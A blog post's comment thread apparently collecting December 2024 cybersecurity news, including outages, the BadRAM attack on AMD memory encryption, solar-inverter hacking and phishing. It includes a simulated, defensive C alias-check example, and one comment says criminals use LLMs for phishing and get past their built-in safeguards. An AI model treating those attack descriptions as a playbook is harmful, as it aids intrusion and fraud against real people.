This posting is here to collect cyber security news in December 2024.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
221 Comments
Tomi Engdahl says:
Interesting trend.
Downdetector shows that around 12:30-1:00 pm central time, major service providers and websites, including Instagram, Facebook, Facebook Messenger, WhatsApp, Reddit, Okta, AWS, Microsoft 365, The Navy Federal Credit Union, Snapchat, Cloudflare, as well as major telcos like T-Mobile, Bell, Telus and Shaw(Rogers) all experienced a spike in user reported downtime, which all seem to have started spiking at the same time, and trailing off at the same time.
I wonder if this was a test by bad actors to see how the providers and the public would respond when major services all go down at once, or whether a major network issue just happened to take a bunch of different companies offline at the same time.
https://www.facebook.com/share/p/G5mEfDUhoHV5qz3H/
When in doubt, it’s a DNS or BGP issue.
Tomi Engdahl says:
https://www.tweaktown.com/news/102082/kioxias-cm7-pcie-5-0-nvme-ssd-cryptographic-module-receives-fips-140-3-level-2-validation/index.html
Tomi Engdahl says:
What the EU’s new software legislation means for developers
The EU Cyber Resilience Act will introduce new cybersecurity requirements for software released in the EU. Learn what it means for your open source projects and what GitHub is doing to ensure the law will be a net win for open source maintainers.
https://github.blog/open-source/maintainers/what-the-eus-new-software-legislation-means-for-developers/
Tomi Engdahl says:
Meta down: Facebook, Instagram, WhatsApp, Messenger and Threads not working amid major outage
Apparent technical problem knocks all of company’s apps offline
https://www.independent.co.uk/tech/facebook-down-instagram-meta-outage-b2662836.html#Echobox=1733941975
All of Meta’s platforms – Facebook, Instagram, WhatsApp, Messenger and Threads – appear to have broken in a huge outage.
The company’s systems appear to have suffered a major technical issue at around 6pm UK time, or 10 am local pacific time, according to tracking website Down Detector. Problems appeared to be widespread across the world, the site showed.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/ivanti-warns-of-maximum-severity-csa-auth-bypass-vulnerability/
Tomi Engdahl says:
https://louhosdigital.fi/blogi/somesta-on-tullut-huijareiden-leikkikentta-nain-valtat-yleisimmat-konnankoukut?utm_source=meta&utm_medium=paid%20social&utm_campaign=huijaukset-fb&hsa_acc=1199843640121417&hsa_cam=120214571601720181&hsa_grp=120214571601740181&hsa_ad=120214571601760181&hsa_src=fb&hsa_net=facebook&hsa_ver=3&fbclid=IwY2xjawHC0jxleHRuA2FlbQEwAGFkaWQBqxaEVVfuBQEdY66ktP_UXOyYT5VTaB7GuHobSxWsNs1rwOs780-gDcdgLC_LJeeCmELS_aem_55hcewASkWo1VDGG0WQYtA
Tomi Engdahl says:
https://www.uusiteknologia.fi/2024/12/11/androxgh0st-iskee-iot-laitteisiin-ja-kriittiseen-infrastruktuuriin/
Tomi Engdahl says:
Risks and problems have been observed in Estonia's system right from the start, and a few years ago more were found again, in this report too. Hopefully someone there takes them seriously. I myself don't believe the system can ever be made sufficiently trustworthy. https://news.postimees.ee/6849632/e-voting-task-force-finishes-report-including-25-proposals-for-improving-system
Kenneth Falck No system is risk-free. Every election has been carried out according to plan. These have multi-stage verifications and complaint channels available as well. The system really is sufficiently trustworthy. What I have nevertheless considered especially harmful is that parties with ties to Russia have spread distrust right before elections. One party has in places a rather elderly electorate, so they do not benefit from, for example, the votes of young expatriate Estonians and digital-native youth. But in the traditional paper voting of the EU elections you could at least see the personal identity codes of the previous roughly >10 voters. Nobody has been interested in this, though.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/romanias-election-systems-targeted-in-over-85-000-cyberattacks/?fbclid=IwY2xjawHHd1BleHRuA2FlbQIxMQABHSo3H5eZhHIrztQY6I2SgBtlRC59h1AeHrfEvXDhcjMtpeHj1nl5PrFKtQ_aem_d0gqAkVKPEtKetCiR0BTCQ
Tomi Engdahl says:
No Doughnuts Today? Cyberattack Puts Krispy Kreme in a Sticky Situation
The doughnut and coffeehouse chain confirmed a cyberattack took out parts of its online ordering system in parts of the United States.
https://www.securityweek.com/no-doughnuts-today-cyberattack-puts-krispy-kreme-in-a-sticky-situation/
Tomi Engdahl says:
https://www.securityweek.com/apple-pushes-major-ios-macos-security-updates/
Tomi Engdahl says:
BadRAM Attack Uses $10 Equipment to Break AMD Processor Protections
Academic researchers devise BadRAM, a new attack that uses $10 equipment to break AMD’s latest trusted execution environment protections.
https://www.securityweek.com/badram-attack-uses-10-equipment-to-break-amd-processor-protections/
Academic researchers have devised a new attack that relies on cheap equipment to provide false information to the system processor during startup and break AMD’s latest trusted execution environment guarantees.
Called BadRAM, the new attack uses $10 off-the-shelf equipment to break AMD SEV-SNP (Secure Encrypted Virtualization-Secure Nested Paging), cutting-edge memory integrity protections that rely on encryption and isolation to prevent information leaks and hypervisor-based attacks.
The attack, academics from KU Leuven, University of Lubeck, and University of Birmingham explained in a research paper (PDF), uses a rogue memory module that lies about its size to deceive the processor into revealing encrypted memory.
To break SEV, however, the attacker requires physical access to the memory module’s embedded SPD chip, which stores information about the module’s size.
By tampering with the chip, the attacker can cause aliasing in the physical address space, bypassing control mechanisms to manipulate memory mappings, and resulting in the full compromise of SEV-SNP’s attestation feature.
“We found that tampering with the embedded SPD chip on commercial DRAM modules allows attackers to bypass SEV protections — including AMD’s latest SEV-SNP version. For less than $10 in off-the-shelf equipment, we can trick the processor into allowing access to encrypted memory,” the researchers note.
By doubling the apparent size of the installed DRAM module, the researchers deceived the processor into using ghost addressing bits, creating an aliasing effect where two different physical addresses would refer to the same DRAM location.
After locating these aliases, the researchers discovered that the BadRAM attack could be used to tamper with or replay ciphertexts, and manipulate reverse map table data structure to introduce page-remapping attacks, which SEV-SNP is meant to mitigate.
The academics also discovered that Intel’s SGX protections prevent ciphertext replay or corruption attacks, although they allow write access patterns to be discerned, and that certain DRAM vendors leave SPD unlocked, which could lead to software-only BadRAM attacks.
On Tuesday, AMD announced firmware updates that mitigate the underlying BadRAM weakness. Tracked as CVE-2024-21944 (CVSS score of 5.3), the vulnerability impacts AMD’s 3rd and 4th generation EPYC processors (formerly codenamed Milan, Milan-X, Genoa, Bergamo, Genoa-X, and Siena).
“Improper input validation for DIMM serial presence detect (SPD) metadata could allow an attacker with physical access, ring0 access on a system with a non-compliant DIMM, or control over the Root of Trust for BIOS update, to potentially overwrite guest memory resulting in loss of guest data integrity,” AMD says in its advisory.
AMD notes that using memory modules that lock SPD, following physical security best practices, and applying the newly released AGESA and SEV firmware updates would mitigate the attack, and the academics verify that the updates resolve the issue.
“BadRAM can be mitigated by considering the SPD data as untrusted and performing memory alias checking at boot time, as seen in Intel’s Alias Checking Trusted Module for TDX and scalable SGX. The countermeasures introduced by AMD will similarly validate SPD metadata during the boot process in trusted firmware,” the researchers note.
https://badram.eu/
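The boot-time alias check that the researchers name as the mitigation (treat SPD data as untrusted and probe for aliases before trusting the memory map), written out as an added example; this is not code from the BadRAM researchers or from AMD. The DIMM, its SPD capacity field and the wrap-around address decoding are a simulation, and MIN_PROBE_BIT is an assumed probing granularity.

```c
/*
 * Simulated boot-time DRAM alias check (added example, not vendor code).
 *
 * Model: a DIMM is a backing array whose real capacity is a power of two,
 * plus an SPD field that may claim more. The simulated module decodes only
 * log2(real_size) address bits, so two physical addresses that differ only
 * in the higher "ghost" bits land on the same cell. That is the aliasing
 * effect described above, and it is exactly what the check has to find
 * before any memory map derived from SPD is trusted.
 */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define MIN_PROBE_BIT 12   /* assumption: probe from 4 KiB strides upwards */

typedef struct {
    uint8_t *cells;    /* backing store, real_size bytes */
    size_t real_size;  /* true capacity, power of two */
    size_t spd_size;   /* capacity the SPD chip claims, power of two, untrusted */
} dimm_t;

static dimm_t dimm_create(size_t real_size, size_t spd_size)
{
    dimm_t d = { calloc(real_size, 1), real_size, spd_size };
    if (!d.cells) { perror("calloc"); exit(EXIT_FAILURE); }
    return d;
}

static void dimm_destroy(dimm_t *d) { free(d->cells); d->cells = NULL; }

/* Address bits above the real capacity are ignored by the module. */
static uint8_t dimm_read(const dimm_t *d, size_t addr)
{
    return d->cells[addr & (d->real_size - 1)];
}

static void dimm_write(dimm_t *d, size_t addr, uint8_t value)
{
    d->cells[addr & (d->real_size - 1)] = value;
}

/* Write distinct markers to a and b, then check whether b's write landed at a. */
static int addresses_alias(dimm_t *d, size_t a, size_t b)
{
    dimm_write(d, a, 0xA5);
    dimm_write(d, b, 0x5A);
    return dimm_read(d, a) == 0x5A;
}

/*
 * Walk the address bits the SPD claims exist. The first stride that aliases
 * back onto address 0 is the first ghost bit, and that stride equals the
 * module's real capacity. If no stride aliases, the SPD claim is consistent
 * and is returned unchanged (an SPD that understates capacity only wastes
 * memory and is not flagged here).
 */
static size_t probe_real_size(dimm_t *d)
{
    for (size_t stride = (size_t)1 << MIN_PROBE_BIT; stride < d->spd_size; stride <<= 1) {
        if (addresses_alias(d, 0, stride))
            return stride;
    }
    return d->spd_size;
}

/* 1 if the SPD capacity can be trusted, 0 if the module lies about its size. */
static int spd_consistent(dimm_t *d)
{
    return probe_real_size(d) == d->spd_size;
}

/* Wrappers that build, probe and free a simulated module in one call. */
static size_t simulate_probe(size_t real_size, size_t spd_size)
{
    dimm_t d = dimm_create(real_size, spd_size);
    size_t found = probe_real_size(&d);
    dimm_destroy(&d);
    return found;
}

static int simulate_check(size_t real_size, size_t spd_size)
{
    dimm_t d = dimm_create(real_size, spd_size);
    int ok = spd_consistent(&d);
    dimm_destroy(&d);
    return ok;
}

int main(void)
{
    const size_t real = (size_t)1 << 20;   /* 1 MiB simulated module */

    /* Honest module: SPD matches the array, no alias is found. */
    printf("honest  : probed %zu, spd %zu, consistent=%d\n",
           simulate_probe(real, real), real, simulate_check(real, real));

    /* Tampered SPD claiming double the capacity: bit 20 is a ghost bit, so
     * address 0 and address 1 MiB hit the same cell and the check fails. */
    printf("tampered: probed %zu, spd %zu, consistent=%d\n",
           simulate_probe(real, real * 2), real * 2, simulate_check(real, real * 2));
    return 0;
}
```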
Tomi Engdahl says:
https://www.securityweek.com/google-pays-55000-for-high-severity-chrome-browser-bug/
Tomi Engdahl says:
Now on Demand: Inside a Hacker’s Playbook – How Cybercriminals Use Deepfakes
This eye-opening session pulls back the curtain on how bad actors exploit social engineering tactics, like deepfake technology and Business Email Compromise (BEC).
https://www.securityweek.com/webinar-today-inside-a-hackers-playbook-how-cybercriminals-use-deepfakes/
Tomi Engdahl says:
https://www.securityweek.com/atlassian-splunk-patch-high-severity-vulnerabilities/
Tomi Engdahl says:
Google’s Willow Chip Signals the Urgency of Post-Quantum Cryptography Migration
Google’s Willow quantum chip marks a transformative moment in quantum computing development.
https://www.securityweek.com/googles-willow-chip-signals-the-urgency-of-post-quantum-cryptography-migration/
Forget the 10 septillion years needed for a classical computer to solve this problem, and focus instead on the falling number of necessary error correction qubits.
Google announced its latest quantum computing advance, the Willow chip, on December 9, 2024. The announcement focuses on two aspects: current power and future potential.
The power is demonstrated by large numbers: Willow can solve a problem in less than five minutes that would take a classical supercomputer 10 septillion years to solve. Now, even though the supercomputer and the length of time it would take are not factual but obviously simulations, and even though the problem may have been developed specifically to be solved by Willow, this is mighty impressive.
Karl Holmqvist, founder and CEO of Lastwall, explains the process. “What Google achieved with Willow involves something called random circuit sampling (RCS), which generates random quantum circuits specifically designed as a benchmark for quantum computers,” he told SecurityWeek.
“RCS is about creating complex pseudo-random quantum circuits, making it extremely difficult for classical computers to process. In that sense, it’s a contrived problem because it’s built specifically to test quantum systems. However, it is also an accepted benchmark for evaluating whether a system can harness quantum effects.”
It is and is meant to be impressive. Note that in 2019 Google bragged about achieving ‘quantum supremacy’ with a quantum computer that could solve a different problem that would take a supercomputer 10,000 years to solve in around 200 seconds. Willow shows a remarkable improvement in just five years.
But it is perhaps not as impressive as we are meant to assume. There is no apparent dramatic decrease in the time to a cryptographically relevant quantum computer (CRQC) – that point at which a quantum computer will be able to decrypt current PKE encryption. To put it bluntly, it is specifically CRQC rather than quantum computing in general that is of current concern to cybersecurity professionals.
It is the other part of the Willow announcement that is of greater importance — Google appears to have made a breakthrough in quantum error correction. Qubits are so inherently fragile (prone to errors from environmental noise, decoherence, and operational imperfections) that each ‘functioning’ qubit requires many more qubits to correct the errors. Without that error correction, a quantum computer effectively decays into a classical computer.
Willow has 105 qubits. IBM’s Osprey says it has 433 qubits. “What’s the use of a high qubit count if error rates are so high the results cannot be trusted?” asks Skip Sanzeri, co-founder and COO, QuSecure. “I think it’s safe to say that IBM and others have not yet achieved these error correction milestones or most likely we would have heard about them. We can bet that all eyes will be on Google as other companies and nation-states will attempt to mimic Willow’s error correction.”
Google has demonstrated with Willow that it can increase the number of qubits while simultaneously reducing the reliance on error correcting qubits.
“This is a major watershed moment for quantum computation design, marked by the demonstration of below-threshold scaling capabilities,”
It is impossible to say that Willow and Google’s below threshold error correction brings the day of CRQC any closer, but it does have that potential. The real lesson for security folk is that we no longer dare delay our cryptographic migration to NIST’s post quantum and agile encryption algorithms. To do so goes beyond folly.
https://www.securityweek.com/post-quantum-cryptography-standards-officially-announced-by-nist-a-history-and-explanation/
Tomi Engdahl says:
Lawrence Abrams / BleepingComputer:
A global outage has hit Facebook, Instagram, Threads, and WhatsApp, starting at approximately 12:40pm ET; Meta says it’s “99% of the way” to resolving the issue — Facebook, Instagram, Threads, and WhatsApp suffered a massive worldwide outage Wednesday afternoon, with services impacted in varying degrees based on the user’s region.
Facebook, Instagram, WhatsApp hit by massive worldwide outage
https://www.bleepingcomputer.com/news/technology/facebook-instagram-whatsapp-hit-by-massive-worldwide-outage/
Tomi Engdahl says:
Maxwell Zeff / TechCrunch:
OpenAI says ChatGPT, API, and Sora traffic has largely recovered, after a multi-hour outage, and that it is monitoring the situation to ensure full resolution
ChatGPT and Sora experienced a major outage
https://techcrunch.com/2024/12/11/chatgpt-and-sora-are-down/
Tomi Engdahl says:
Firefox is ending Do Not Track, but there are better ways to protect your privacy – here’s what I recommend
The Firefox feature never really worked – here’s what to use instead
https://www.techradar.com/computing/firefox-is-ending-do-not-track-but-there-are-better-ways-to-protect-your-privacy-heres-what-i-recommend?utm_source=facebook.com&utm_campaign=socialflow&utm_content=techradar&utm_medium=social&fbclid=IwZXh0bgNhZW0CMTEAAR3ajiP-xmQkWr5y3QmSwCRlp9HDCahfRsAXTVoR7dNUytKDnaSwdiLQL2Q_aem_1iqCdbfo-F5Yd_3F_wM2_A
Tomi Engdahl says:
Read more: https://www.iflscience.com/your-password-may-be-stronger-than-us-nuclear-codes-during-the-cold-war-77173
Tomi Engdahl says:
“And so the ‘secret unlock code’ during the height of the nuclear crises of the Cold War remained constant at OOOOOOOO”
Tomi Engdahl says:
Marietje Schaake / Financial Times:
The EU’s TikTok scrutiny over the Romanian presidential election will be a litmus test for the DSA and should finally uncover details of algorithmic influence
Romania’s cancelled election is a lesson in social media manipulation
Investigations should finally shed light on how algorithms win votes and influence people
https://www.ft.com/content/2855bf6f-4b40-412d-8249-64c90370bbd2
Romania shocked the world last month when it voted for an outsider with ultranationalist views as president. Călin Georgescu was polling poorly just weeks before the election. TikTok was crucial to his sudden success. It also appears to have been a key facilitator of foreign interference from Russia.
Romania’s constitutional court has since opted to annul the results of the first election round. All eyes are once more on social media platforms and their ability to influence election outcomes. Until now, extraordinary discretion has been left to the companies curating our information ecosystem — Romania may turn the tide.
Suspicious online accounts, polls and paid influencers sharing political content are all seen as key online tools for influencing Romanian votes.
Within the country, intelligence services have accused Russia of aggressively using TikTok to promote Georgescu. The US state department describes “malign cyber activity”. In Europe, the Digital Services Act (DSA) has been invoked to impose a “retention order” that demands TikTok preserve all data related to European elections for scrutiny. A company representative for TikTok emphasised its compliance with EU law in a recent hearing before the European parliament.
After years of lingering questions about the precise impact of social media platforms on democracy, European investigations should finally shed light on the details of algorithmic influence. There will be lessons learned around the world.
Most importantly, it will be a litmus test for the enforcement of the DSA. This recently implemented law seeks to minimise harm by spelling out content moderation obligations for large online platforms. That includes mitigating systemic risks such as to the electoral process.
TikTok points out that it does not allow political advertisements and enforces measures against covert influence. Yet such corporate rules may not always be enforced. Researchers at non-profit organisation Reset Tech, Check First and EU DisinfoLab found evidence of co-ordinated posts about Georgescu on social media and stated that Meta had also failed to enforce its own policies, which “demonstrates Meta’s failure to follow the European Commission’s recommendations to comply with the DSA”.
Europe’s new law can challenge failures of self-regulation. For democracies under attack, avoiding an overestimation of disinformation and manipulation, while ensuring the risks are not underestimated, is key to political and policy responses.
Detailed independent research is also crucial for fostering greater public understanding. Societal resilience against attempts to undermine democracy must be fact based.
That democracies and electoral processes are under attack is clear — from foreign interference to domestically-fuelled efforts intended to mislead and polarise voters.
But assessing the exact impact and causality has been a challenge for academics around the world. Companies typically don’t want people looking under the hood of their businesses and have shielded proprietary data. Insights gained in Romania’s case will indirectly shed light on any manipulation that takes place via social media platforms in other contexts.
But events in Romania will reach beyond a single company. It will challenge the practice of allowing corporate rules to act as democracy’s best defence.
Details about the interplay between the Kremlin subversion tactics and social media algorithms will hopefully play a significant role in ensuring accountability.
Tomi Engdahl says:
Sheena Vasani / The Verge:
Google rolls out two updates to Android’s unknown tracker alerts feature, letting users pause location updates from their phone and pinpoint unfamiliar trackers — Google is rolling out two new updates to its unknown tracker alerts feature that should make it easier for Android device owners …
Android is making it easier to find unknown trackers to prevent stalking
/ The new features will allow Android device owners to pause location updates and locate unfamiliar trackers.
https://www.theverge.com/2024/12/11/24318992/android-find-my-device-bluetooth-tracker-stalking
Tomi Engdahl says:
Companies need millions of new cyber defenders
https://etn.fi/index.php/13-news/16950-yritykset-tarvitsevat-miljoonia-uusia-kyberturvaajia
Companies around the world have already hired 5.4 million cybersecurity experts, but at the same time the industry still needs 4.7 million more workers to secure organisations' operations. This is shown by data published by the AltIndex.com site.
The costs of cybercrime have grown alarmingly and already exceed the 9.2 trillion dollar mark in 2024. According to forecasts, the sum may rise to as much as 15.6 trillion dollars by the end of the decade. This growth is happening even though companies are investing significantly in developing cybersecurity.
Cyberattacks such as ransomware, data breaches and phishing cause billions of dollars in damage to organisations. The damage arises from, among other things, stolen data, business interruption and reputational harm. The constantly expanding threat of cybercrime highlights the critical role of cybersecurity professionals.
In 2024 the cybersecurity workforce grew by only 0.1%, the smallest growth in six years. At the same time the industry's worker shortage grew by as much as 19%, which means that companies now need more professionals than ever before. The need is especially great in Asia, where companies are looking for 3.3 million cyber defenders, 26% more than last year. In North America the shortage is half a million workers and in Europe over 400,000.
Tomi Engdahl says:
A fake video of Stubb is spreading
Fact-checkers at the news agency AFP have found the video to be forged.
https://www.is.fi/politiikka/art-2000010897505.html
A video containing false information about President of the Republic Alexander Stubb is being shared on social media.
In the video, Stubb is made to appear to give his support to Nigerian separatists, who have campaigned for decades for secession from Nigeria and the creation of an independent state of Biafra.
Fact-checkers at the news agency AFP have found the video to be false. In the original video, published on X in November, President Stubb speaks about the Winter War and expresses his support for Ukraine.
– Finland's Winter War lasted 105 days; your war has lasted ten times longer. We will support you for as long as the war lasts, Stubb says.
The caption published with the false video says the video is ”the Finnish president's promise”. The video has been shared tens of thousands of times on social media.
An image of Simon Ekpa, who is Nigerian-Finnish, has been embedded in the video Stubb made for Ukraine. Ekpa has described himself as the leader of a Nigerian separatist group. From Finland, he has sought to bring about the secession of a Biafran state from Nigeria.
Tomi Engdahl says:
Krispy Kreme confirms online ordering disruption following cyberattack
The company’s IT department, working alongside external cybersecurity specialists, has initiated an investigation to determine the extent and nature of the attack.
https://www.techmonitor.ai/technology/cybersecurity/krispy-kreme-confirms-online-ordering-disruption-following-cyberattack?fbclid=IwY2xjawHH12lleHRuA2FlbQIxMQABHeU6zdnom2LrjiI-AlrXEARFWySKnFMmHQkDuDs4qUAdOW0h6nx9KFfI7Q_aem_MX1ByFIETs5jLt6q4QEUMQ
Tomi Engdahl says:
Here is yet another hybrid vector that needs to be kept an eye on. The information security of solar panel control systems is not necessarily in top shape, and although they are distributed, at least in theory large numbers of them can be cracked at once. I don't know what kind of monoculture prevails in these products, that is, whether an unduly large share of them are coded by the same manufacturer.
Hacking Rooftop Solar Is a Way to Break Europe’s Power Grid
The rush to install millions of smart panels is creating vulnerabilities inside electricity networks
https://www.bloomberg.com/news/articles/2024-12-12/europe-s-power-grid-vulnerable-to-hackers-exploiting-rooftop-solar-panels?fbclid=IwZXh0bgNhZW0CMTEAAR3zsCxEKrcPeyLk5cp5wsvT8rIGCxWf1BAfe7xqhtbm9wme41IIeQvTni0_aem_OifU9ZCiNZCZfysoYotp0Q
All it takes is one hacker and a batch of faulty solar panels to threaten the safety of Europe’s electric grid.
Vangelis Stykas, a cybersecurity consultant, said he figured out how to do it. Using a laptop and smartphone at his home in Thessaloniki, Greece, Stykas bypassed firewalls in panels around the world and gained access to more power than runs through Germany’s entire system.
The “white-hat hacker,” who tests software so companies can fix flaws, said he got far enough inside the controls that he could have turned the devices off, dramatically tipping the supply-demand balance for the power network. Such a drastic fluctuation could stress a grid to the point where it shuts down as a fail-safe, he said.
The exponential growth of rooftop solar systems means millions more connection points to the grid, creating a massive vulnerability that hackers could exploit. The most serious impact may be cascading grid failures across the continent. That risk is a growing concern for utilities and governments dealing with more cyberattacks every year.
“We are growing increasingly dependent on these devices, but even as they become critical national infrastructure, they are not fully secure,” said Stykas, 41, co-founder of security firm Atropos.ai. “If these can be hacked, that leaves Europe’s grid, which underpins our entire lifestyle, vulnerable.”
The average number of weekly cyberattacks on utilities worldwide doubled within two years to about 1,100, and they’re occurring more frequently as digitalization takes hold, the International Energy Agency said. The European Union suffered more than 200 reported cyberattacks on energy infrastructure last year, and that number has “largely increased in recent years.”
Hostile intentions can range from greed (ransom payments or market manipulation) to terrorism (putting nations in the dark) to war (see Russia’s cyberattacks on Ukraine’s power systems). In Japan, hackers took over solar monitors and used them to steal from bank accounts, local media reported.
Instigators can range from a small group of “hacktivists” motivated by ideology to a state-supported battalion working around the clock.
The threat is serious enough that NATO ran a security drill in Sweden to find and fix vulnerabilities in solar, wind and hydroelectric systems.
The military alliance says it’s the world’s first such exercise, and the scenario comes amid wars in Ukraine and the Middle East, and the West’s fracturing relationships with Russia and China. The latter is the biggest maker of solar panels.
The EU’s biennial Cyber Europe exercise in June focused on energy for the first time. The hypotheticals included responding to state-directed threats against operators of power distribution systems and gas storage sites.
Taking down a nation’s electric grid would be an extreme outcome given that utilities fight off cyberattacks every day and their most critical systems are typically behind multiple layers of security.
As solar proliferates, those tasked with patching any flaws struggle to keep pace with those exploiting them. Germany connected more than 1 million panels to people’s homes and businesses last year — more than the previous six years combined.
The IEA has forecast that 100 million households worldwide will rely on rooftop solar panels for energy by 2030. That’s quadruple the current amount.
Many of those makers focus on keeping prices low, so they’re not spending money on experienced programmers to design sophisticated protection software.
“The speed at which the sector is growing means that people may not be investing as much into risk management and security as they ordinarily would,” said Dick O’Brien, principal intelligence analyst at cybersecurity provider Symantec.
(Chart: Grid Cybersecurity Costs To Soar Under Net Zero; annual spending on grid cybersecurity in a net zero scenario)
In his tests to control the panels, Stykas targeted circuits called inverters that are connected to the cloud and convert sunlight into electricity for the grid.
A bad actor could turn the inverters off, infect them with malware or plant digital booby traps for activation later. Stykas told the makers he cracked their firewalls, but only some made fixes, he said.
Earlier this year, attackers accessed about 800 solar power monitoring devices made by Japan-based Contec Co. Ltd. and used them as pathways to steal from bank accounts, according to local media. The hackers exploited back doors installed surreptitiously, the manufacturer said in May.
As Europe’s biggest economy and industrial heartland, Germany is a high-value target. The country has earmarked tens of billions of dollars for clean technology add-ons and upgrades to help cut carbon emissions by two-thirds this decade.
(Chart: Renewables to Supply Half of All Power By 2030; share of global electricity generation)
Solar vulnerabilities “are a cause for concern” and “the risk is growing,” the regulatory Federal Network Agency said. RWE AG, Germany’s biggest electricity producer, has cybersecurity “at the top of its agenda,” spokesperson Sarah Knauber said without elaborating.
Next door in the Netherlands, consultant Secura BV identified 27 scenarios in which a cyberattack could significantly disrupt solar installations and, consequently, “hit the energy sector as a whole.”
The UK has a high penetration of renewables, especially wind. More than 95% of energy companies surveyed — including some producing clean power — suffered major disruptions from cyberattacks in the past year, according to Kaspersky Labs Ltd., a security provider. The primary threat was posed by smart devices, the respondents said.
The EU has implemented a handful of laws in recent years to bolster cybersecurity defenses. The European Commission is working on new rules to strengthen protections for solar devices, but they will give companies as long as 18 months to comply. A spokesman declined to comment.
The first report assessing the bloc’s readiness was released this month, and it listed energy as one of the top 10 targets for hackers. Supply chains were especially vulnerable.
“If we don’t take it seriously, then people are going to lose trust in the network,” said Nathan Morelli, head of cybersecurity at SA Power Networks in Australia, which has the highest solar penetration in the world. “That ultimately impacts our ability to encourage growth and further development in renewables.”
Tomi Engdahl says:
Shopping scam surprised an expert: ”I'll order this right away”
Anyone can fall for an online scam. An information security expert's experience proves it.
https://www.is.fi/digitoday/tietoturva/art-2000010897592.html
Samuli Könönen, an information security expert at the National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom, fell victim to an online scammer. He spoke about his experience at a seminar of the Digital and Population Data Services Agency on Wednesday.
Könönen had been looking for a new backpack when one day an advertisement came up on social media. It showed backpacks of the same brand that Könönen had already been looking at earlier.
– Wow, it was cheap, I'll order it right away from here, Könönen describes his thoughts at the time.
Later the same day Könönen realised that no order confirmation of any kind had arrived for the backpack. By digging through his browsing history Könönen realised that the online store was not very trustworthy after all.
– A call to the bank and cancelling the payment card, Könönen sums up his immediate next steps.
Tomi Engdahl says:
Data Breaches
Phishing: The Silent Precursor to Data Breaches
Phishing is more than a mere nuisance—it is a formidable precursor to destructive data breaches.
https://www.securityweek.com/phishing-the-silent-precursor-to-data-breaches/
Tomi Engdahl says:
Don't click or scan anything you don't recognise
https://etn.fi/index.php/13-news/16953-aelae-klikkaa-aelaekae-skannaa-mitaeaen-mitae-et-tunne
Generative AI is making phishing ever more effective. As much as 98–99 percent of phishing messages arrive by email, says Check Point information security expert Jarno Ahlström. This means that you really shouldn't click on anything unfamiliar in your inbox.
- The share of email as a delivery channel for pure phishing is currently of that order. If we look at phishing from the attack perspective, several studies say that over 90 percent of all cyberattacks begin with a phishing message, Ahlström reminds.
In phishing, generative AI and large language models (LLMs) have really revolutionised the market. Criminals often use open models. There are known cases where Meta's Llama variants have been used by criminals, but Ahlström does not want to single out any individual model.
- Free or very cheap options are of course always more attractive when trying to maximise profits. But closed models can just as well be exploited here. The protection mechanisms built into them can be circumvented. The intention, after all, is that even the user wouldn't be able to distinguish these from completely normal and proper communication.
An open LLM model is perfectly suited to localising a phishing message. – If a phishing message is thought of simply as a message, the model doesn't even need to be cracked any further for localisation. Translating individual sentences is quite easy, and the result is hard to distinguish from proper communication.
Tomi Engdahl says:
Someone forged Finnish banks' websites
Credibly forged bank websites are in circulation.
https://www.iltalehti.fi/digiuutiset/a/4e0f90e4-f795-4b5c-9a8b-2f887bd0dbca
The National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom warns in its weekly review about forged bank websites.
The Cyber Security Centre says it has become aware of scam sites imitating the pages of both Aktia and POP Bank. The authority calls the forgeries credible.
Banks, the police and other authorities therefore advise going to online banking by typing the service's official address into the browser's address bar. The safe, self-entered address can be saved in the browser's bookmarks for later use.
Tomi Engdahl says:
Traficom data breach: a 20-year-old man justified his act in an alarming way
The 20-year-old man has justified his actions by, among other things, having "too much time".
https://www.iltalehti.fi/digiuutiset/a/73a00ad0-23ad-47de-98d4-8d6dbaa11b57
The pre-trial investigation into the aggravated data breach at Traficom has now been completed. The 20-year-old man has admitted the act in questioning and cited "a desire to experiment and too much time" as his motive. The man had obtained the usernames and passwords from the dark web.
The man broke into a Helsinki-based company's software and gained access to data in Traficom's vehicle register between 6 and 14 May this year.
In the breach the man used the credentials of employees of two customer companies and used them to make queries to the vehicle register. The man's searches targeted the data of the owners and holders of roughly 65,000 vehicles.
The man is suspected of having snooped on the owner and holder data of around 50 vehicles. The police have contacted those people. The pre-trial investigation, however, found no indication that the man had stored the data anywhere or viewed any other than the fifty mentioned above.
The case has been referred for consideration of charges. In addition to the Traficom breach, the police suspect the man also retrieved data from the Tax Administration's positive credit register. He did not, however, obtain data from there, as the responses to the queries had been delivered as separate messages to the customer company in whose name the data was requested.
– Despite thorough investigations, no signs were found that the data taken from Traficom and the Tax Administration had been misused
Tomi Engdahl says:
More information on the data breach at a well-known Finnish hotel
Hotel Tahko urges vigilance against possible phishing attempts.
https://www.iltalehti.fi/digiuutiset/a/18517dc3-3a89-4bc9-843e-f4a0e6fcbd70
Tomi Engdahl says:
Jordan Novet / CNBC:
Sublime Security, which uses AI to scan companies’ and political campaigns’ emails for phishing, raised a $60M Series B, taking its total funding to $93.8M
Venture capitalists bet on Sublime, a startup bringing AI to email security
https://www.cnbc.com/2024/12/12/email-security-startup-sublime-raises-60-million.html
Generative AI has given attackers a way to automate the process of crafting emails that could help them crack corporate systems.
Abnormal Security, which uses generative AI to help spot and block such email threats, reached a $5 billion valuation this year.
Now investors have put $60 million into Sublime Security, which aims to use AI to protect inboxes.
Across the world, companies rely on Microsoft and Google to administer email accounts for employees. Keeping all those mailboxes secure, however, is a business opportunity.
Proofpoint went public in 2012, and as enterprises migrated to the cloud, many adopted the company’s secure email gateway software as a precautionary measure. But private equity firm Thoma Bravo bought Proofpoint in 2021, and another provider, Mimecast, went private in 2022.
Then generative artificial intelligence took off. The trending technology gave more ammunition to hackers, as well as new tools for security companies that promise to defend clients against attacks.
Now, a new set of companies are gaining traction in a mature market.
Investors valued startup Material Security at $1.1 billion in a 2022 funding round. In August, Abnormal Security, which calls itself "AI-native," said it was worth $5.1 billion after a funding round involving CrowdStrike and Wellington Management. And on Thursday, Sublime Security, co-founded by U.S. Defense Department cybersecurity veteran Josh Kamdjou, said it had raised a round totaling $60 million.
Kamdjou, who is also Sublime’s CEO, had spent his former career showing companies how he could break into their networks and avoid being stymied by email security products. Then he decided to work on a solution.
“I decided to build something that would stop me as an attacker,” he said.
Tomi Engdahl says:
ICS/OT
